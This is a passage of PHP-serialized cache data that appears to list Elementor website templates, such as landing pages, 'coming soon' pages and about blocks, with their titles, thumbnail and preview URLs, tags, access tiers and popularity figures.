Service\";s:9:\"thumbnail\";s:79:\"https://library.elementor.com/wp-content/uploads/2021/01/Pilates-Instructor.png\";s:12:\"tmpl_created\";i:1610534138;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:135:\"https://library.elementor.com/lp/pilates-instructor-online-service/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:14:\"Online Service\";s:4:\"tags\";s:70:\"[\"Free Trial\",\"Instructor\",\"Landing Pages\",\"Online Service\",\"Pilates\"]\";s:10:\"menu_order\";i:44;s:16:\"popularity_index\";i:778;s:11:\"trend_index\";i:412;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:289;a:19:{s:4:\"tmpl\";i:1416;s:2:\"id\";i:24104;s:5:\"title\";s:33:\"Ceramics Shop &#8211; Coming Soon\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2022/04/Coming-Soon-Ceramics-Shop.jpg\";s:12:\"tmpl_created\";i:1650988949;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/ceramics-shop-coming-soon/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:115:\"[\"Art\",\"Business\",\"Coming Soon\",\"Creative\",\"Decor\",\"Design\",\"Furniture Design\",\"Interior Design\",\"Products\",\"Shop\"]\";s:10:\"menu_order\";i:44;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:290;a:19:{s:4:\"tmpl\";i:557;s:2:\"id\";i:6135;s:5:\"title\";s:8:\"About 10\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/about_black_2.png\";s:12:\"tmpl_created\";i:1520443663;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/about-10/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:45;s:16:\"popularity_index\";i:77;s:11:\"trend_index\";i:47;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:291;a:19:{s:4:\"tmpl\";i:1412;s:2:\"id\";i:24033;s:5:\"title\";s:37:\"Dance Studio &#8211; Maintenance Mode\";s:9:\"thumbnail\";s:90:\"https://library.elementor.com/wp-content/uploads/2022/04/Maintenance-Mode-Dance-Studio.jpg\";s:12:\"tmpl_created\";i:1649881344;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:128:\"https://library.elementor.com/dance-studio-maintenance-mode/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:113:\"[\"Academy\",\"Business\",\"Dance Studio\",\"Form\",\"Pilates\",\"School\",\"Sport\",\"Teacher\",\"Training\",\"Under Construction\"]\";s:10:\"menu_order\";i:45;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:292;a:19:{s:4:\"tmpl\";i:1190;s:2:\"id\";i:18568;s:5:\"title\";s:32:\"Flower Delivery &#8211; Business\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2021/04/Flower-Delivery.png\";s:12:\"tmpl_created\";i:1617546716;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:126:\"https://library.elementor.com/lp/flower-delivery-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:37:\"[\"Delivery\",\"Flower\",\"Landing Pages\"]\";s:10:\"menu_order\";i:45;s:16:\"popularity_index\";i:874;s:11:\"trend_index\";i:763;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:293;a:19:{s:4:\"tmpl\";i:1145;s:2:\"id\";i:16917;s:5:\"title\";s:22:\"Webinar &#8211; Events\";s:9:\"thumbnail\";s:80:\"https://library.elementor.com/wp-content/uploads/2021/01/Webinar-Library-Pic.jpg\";s:12:\"tmpl_created\";i:1610466822;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/lp/webinar-events/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:6:\"Events\";s:4:\"tags\";s:36:\"[\"Events\",\"Landing Pages\",\"Webinar\"]\";s:10:\"menu_order\";i:46;s:16:\"popularity_index\";i:821;s:11:\"trend_index\";i:0;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:294;a:19:{s:4:\"tmpl\";i:1413;s:2:\"id\";i:24049;s:5:\"title\";s:33:\"ECO Shop &#8211; Maintenance Mode\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2022/04/Maintenance-Mode-ECO-Shop.jpg\";s:12:\"tmpl_created\";i:1649882053;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/eco-shop-maintenance-mode/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:110:\"[\"Aesthetic\",\"Business\",\"Creative\",\"Decor\",\"Health\",\"Help\",\"Lifestyle\",\"Products\",\"Shop\",\"Under Construction\"]\";s:10:\"menu_order\";i:46;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:295;a:19:{s:4:\"tmpl\";i:497;s:2:\"id\";i:5397;s:5:\"title\";s:8:\"About 11\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/about_white_1.png\";s:12:\"tmpl_created\";i:1520443503;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/about-11/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:46;s:16:\"popularity_index\";i:148;s:11:\"trend_index\";i:43;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:296;a:19:{s:4:\"tmpl\";i:1154;s:2:\"id\";i:17079;s:5:\"title\";s:42:\"Calls Volunteer &#8211; Social Involvement\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2021/01/Calls-Volunteer.png\";s:12:\"tmpl_created\";i:1610631774;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:136:\"https://library.elementor.com/lp/calls-volunteer-social-involvement/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:18:\"Social Involvement\";s:4:\"tags\";s:68:\"[\"Care\",\"Covid-19\",\"Help\",\"Involvement\",\"Landing Pages\",\"Volunteer\"]\";s:10:\"menu_order\";i:47;s:16:\"popularity_index\";i:854;s:11:\"trend_index\";i:0;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:297;a:19:{s:4:\"tmpl\";i:1419;s:2:\"id\";i:24136;s:5:\"title\";s:29:\"Food Blog &#8211; Coming Soon\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2022/04/Coming-Soon-Food-Blog.jpg\";s:12:\"tmpl_created\";i:1650990034;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/food-blog-coming-soon/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:62:\"[\"Blog\",\"Business\",\"Coming Soon\",\"Cooking\",\"Education\",\"Food\"]\";s:10:\"menu_order\";i:47;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:298;a:19:{s:4:\"tmpl\";i:1142;s:2:\"id\";i:16836;s:5:\"title\";s:33:\"Marketing Agency &#8211; Business\";s:9:\"thumbnail\";s:89:\"https://library.elementor.com/wp-content/uploads/2021/01/Marketing-Agency-Library-Pic.jpg\";s:12:\"tmpl_created\";i:1610464490;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:127:\"https://library.elementor.com/lp/marketing-agency-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:74:\"[\"Agency\",\"Business\",\"Landing Pages\",\"Marketing\",\"Marketing Landing Page\"]\";s:10:\"menu_order\";i:48;s:16:\"popularity_index\";i:816;s:11:\"trend_index\";i:787;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:299;a:19:{s:4:\"tmpl\";i:1411;s:2:\"id\";i:24020;s:5:\"title\";s:35:\"Mobile App &#8211; Maintenance Mode\";s:9:\"thumbnail\";s:88:\"https://library.elementor.com/wp-content/uploads/2022/04/Maintenance-Mode-Mobile-App.jpg\";s:12:\"tmpl_created\";i:1649880955;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:126:\"https://library.elementor.com/mobile-app-maintenance-mode/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:77:\"[\"App\",\"Business\",\"Coding\",\"Computer\",\"Launch\",\"Mobile\",\"Under Construction\"]\";s:10:\"menu_order\";i:48;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:300;a:19:{s:4:\"tmpl\";i:498;s:2:\"id\";i:5405;s:5:\"title\";s:8:\"About 12\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/about_black_1.png\";s:12:\"tmpl_created\";i:1520443505;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/about-12/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:48;s:16:\"popularity_index\";i:216;s:11:\"trend_index\";i:50;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:301;a:19:{s:4:\"tmpl\";i:1139;s:2:\"id\";i:16785;s:5:\"title\";s:42:\"Gym Promotion &#8211; Health &amp; Fitness\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2021/01/Gym-LP.jpg\";s:12:\"tmpl_created\";i:1610455496;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:130:\"https://library.elementor.com/lp/gym-promotion-health-fitness/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:18:\"Health and Fitness\";s:4:\"tags\";s:42:\"[\"Fitness\",\"Gym\",\"Health\",\"Landing Pages\"]\";s:10:\"menu_order\";i:49;s:16:\"popularity_index\";i:820;s:11:\"trend_index\";i:0;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:302;a:19:{s:4:\"tmpl\";i:1420;s:2:\"id\";i:24152;s:5:\"title\";s:32:\"Perfume Shop &#8211; Coming Soon\";s:9:\"thumbnail\";s:85:\"https://library.elementor.com/wp-content/uploads/2022/04/Coming-Soon-Perfume-Shop.jpg\";s:12:\"tmpl_created\";i:1650990353;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:123:\"https://library.elementor.com/perfume-shop-coming-soon/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:68:\"[\"Business\",\"Coming Soon\",\"Cosmetics\",\"Lifestyle\",\"Products\",\"Shop\"]\";s:10:\"menu_order\";i:49;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:303;a:19:{s:4:\"tmpl\";i:1185;s:2:\"id\";i:18492;s:5:\"title\";s:34:\"Bicycle Pre-Sale &#8211; eCommerce\";s:9:\"thumbnail\";s:90:\"https://library.elementor.com/wp-content/uploads/2021/04/Library-Pic-Bike-Landing-Page.png\";s:12:\"tmpl_created\";i:1617535552;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:128:\"https://library.elementor.com/lp/bicycle-pre-sale-ecommerce/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:9:\"eCommerce\";s:4:\"tags\";s:34:\"[\"Bicycle\",\"Landing Pages\",\"Sale\"]\";s:10:\"menu_order\";i:50;s:16:\"popularity_index\";i:871;s:11:\"trend_index\";i:826;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:304;a:19:{s:4:\"tmpl\";i:1418;s:2:\"id\";i:24126;s:5:\"title\";s:28:\"Skincare &#8211; Coming Soon\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2022/04/Coming-Soon-Skincare.jpg\";s:12:\"tmpl_created\";i:1650989585;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/skincare-coming-soon/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:128:\"[\"Aesthetic\",\"Beauty\",\"Beauty Salon\",\"Business\",\"Coming Soon\",\"Cosmetics\",\"Girly\",\"Lifestyle\",\"Services\",\"Skincare\",\"Treatment\"]\";s:10:\"menu_order\";i:51;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:305;a:19:{s:4:\"tmpl\";i:1181;s:2:\"id\";i:18349;s:5:\"title\";s:39:\"Virtual try-on glasses &#8211; Business\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2021/03/250x280-8.png\";s:12:\"tmpl_created\";i:1614772569;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/lp/virtual-try-on-glasses-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:64:\"[\"Fashion\",\"Glasses\",\"Landing Pages\",\"Online Service\",\"Virtual\"]\";s:10:\"menu_order\";i:51;s:16:\"popularity_index\";i:848;s:11:\"trend_index\";i:803;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:306;a:19:{s:4:\"tmpl\";i:500;s:2:\"id\";i:5421;s:5:\"title\";s:8:\"About 13\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/about_white_3.png\";s:12:\"tmpl_created\";i:1520443509;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/about-13/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:51;s:16:\"popularity_index\";i:215;s:11:\"trend_index\";i:77;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:307;a:19:{s:4:\"tmpl\";i:513;s:2:\"id\";i:5533;s:5:\"title\";s:8:\"About 15\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2018/03/about_black_10.png\";s:12:\"tmpl_created\";i:1520443534;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/about-15/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:52;s:16:\"popularity_index\";i:21;s:11:\"trend_index\";i:57;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:308;a:19:{s:4:\"tmpl\";i:1410;s:2:\"id\";i:24004;s:5:\"title\";s:33:\"Skincare &#8211; Maintenance Mode\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2022/04/Maintenance-Mode-Skincare.jpg\";s:12:\"tmpl_created\";i:1649880534;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/skincare-maintenance-mode/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:144:\"[\"Aesthetic\",\"Beauty\",\"Beauty Salon\",\"Business\",\"Cosmetics\",\"Girly\",\"Lifestyle\",\"Makeup\",\"Services\",\"Skincare\",\"Treatment\",\"Under Construction\"]\";s:10:\"menu_order\";i:52;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:309;a:19:{s:4:\"tmpl\";i:1172;s:2:\"id\";i:17458;s:5:\"title\";s:31:\"Moving Company &#8211; Business\";s:9:\"thumbnail\";s:87:\"https://library.elementor.com/wp-content/uploads/2021/02/Library-Pic-Moving-Company.png\";s:12:\"tmpl_created\";i:1612727025;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:125:\"https://library.elementor.com/lp/moving-company-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:46:\"[\"Business\",\"Landing Pages\",\"Movers\",\"Moving\"]\";s:10:\"menu_order\";i:52;s:16:\"popularity_index\";i:826;s:11:\"trend_index\";i:767;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:310;a:19:{s:4:\"tmpl\";i:1415;s:2:\"id\";i:24092;s:5:\"title\";s:29:\"Vase Shop &#8211; Coming Soon\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2022/04/Coming-Soon-Vase-Shop.jpg\";s:12:\"tmpl_created\";i:1650988613;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:120:\"https://library.elementor.com/vase-shop-coming-soon/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:115:\"[\"Art\",\"Business\",\"Coming Soon\",\"Creative\",\"Decor\",\"Design\",\"Furniture Design\",\"Interior Design\",\"Products\",\"Shop\"]\";s:10:\"menu_order\";i:53;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:311;a:19:{s:4:\"tmpl\";i:1186;s:2:\"id\";i:18517;s:5:\"title\";s:29:\"Food Blog &#8211; Coming Soon\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2021/04/Library-Pic-Food-Blog.png\";s:12:\"tmpl_created\";i:1617539897;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:123:\"https://library.elementor.com/lp/food-blog-coming-soon/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:16:\"Coming Soon Page\";s:4:\"tags\";s:45:\"[\"Blog\",\"Coming Soon\",\"Food\",\"Landing Pages\"]\";s:10:\"menu_order\";i:53;s:16:\"popularity_index\";i:844;s:11:\"trend_index\";i:672;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:312;a:19:{s:4:\"tmpl\";i:1167;s:2:\"id\";i:17379;s:5:\"title\";s:33:\"IT Service &#8211; Online Service\";s:9:\"thumbnail\";s:83:\"https://library.elementor.com/wp-content/uploads/2021/02/Library-Pic-IT-Service.png\";s:12:\"tmpl_created\";i:1612713022;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:127:\"https://library.elementor.com/lp/it-service-online-service/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:14:\"Online Service\";s:4:\"tags\";s:41:\"[\"IT\",\"Landing Pages\",\"Remote\",\"Support\"]\";s:10:\"menu_order\";i:54;s:16:\"popularity_index\";i:806;s:11:\"trend_index\";i:634;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:313;a:19:{s:4:\"tmpl\";i:1248;s:2:\"id\";i:22134;s:5:\"title\";s:32:\"Art Magazine &#8211; Coming Soon\";s:9:\"thumbnail\";s:95:\"https://library.elementor.com/wp-content/uploads/2021/10/Art-Magazine-Coming-Soon-250x280-1.jpg\";s:12:\"tmpl_created\";i:1647176713;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:123:\"https://library.elementor.com/art-magazine-coming-soon/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:48:\"[\"Art\",\"Coming Soon\",\"Landing Pages\",\"Magazine\"]\";s:10:\"menu_order\";i:54;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:314;a:19:{s:4:\"tmpl\";i:512;s:2:\"id\";i:5525;s:5:\"title\";s:8:\"About 14\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2018/03/about_white_10.png\";s:12:\"tmpl_created\";i:1520443532;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/about-14/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:11:\"access_tier\";s:4:\"free\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:55;s:16:\"popularity_index\";i:9;s:11:\"trend_index\";i:29;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:315;a:19:{s:4:\"tmpl\";i:1189;s:2:\"id\";i:18560;s:5:\"title\";s:52:\"Finance Learning Platform &#8211; Under Construction\";s:9:\"thumbnail\";s:89:\"https://library.elementor.com/wp-content/uploads/2021/04/Library-Pic-Finance-Platform.png\";s:12:\"tmpl_created\";i:1617542761;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:146:\"https://library.elementor.com/lp/finance-learning-platform-under-construction/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:18:\"Under Construction\";s:4:\"tags\";s:27:\"[\"Finance\",\"Landing Pages\"]\";s:10:\"menu_order\";i:55;s:16:\"popularity_index\";i:843;s:11:\"trend_index\";i:561;s:18:\"editor_layout_type\";s:0:\"\";s:15:\"minimum_version\";s:5:\"0.0.0\";s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:316;a:19:{s:4:\"tmpl\";i:1225;s:2:\"id\";i:21041;s:5:\"title\";s:41:\"Business Consulting Company &#8211; About\";s:9:\"thumbnail\";s:96:\"https://library.elementor.com/wp-content/uploads/2021/12/8-About-Business-Consulting-Company.jpg\";s:12:\"tmpl_created\";i:1638797560;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/business-consulting-company-about/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:11:\"access_tier\";s:9:\"essential\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:51:\"[\"Coach\",\"Collaboration\",\"Consulting\",\"Life 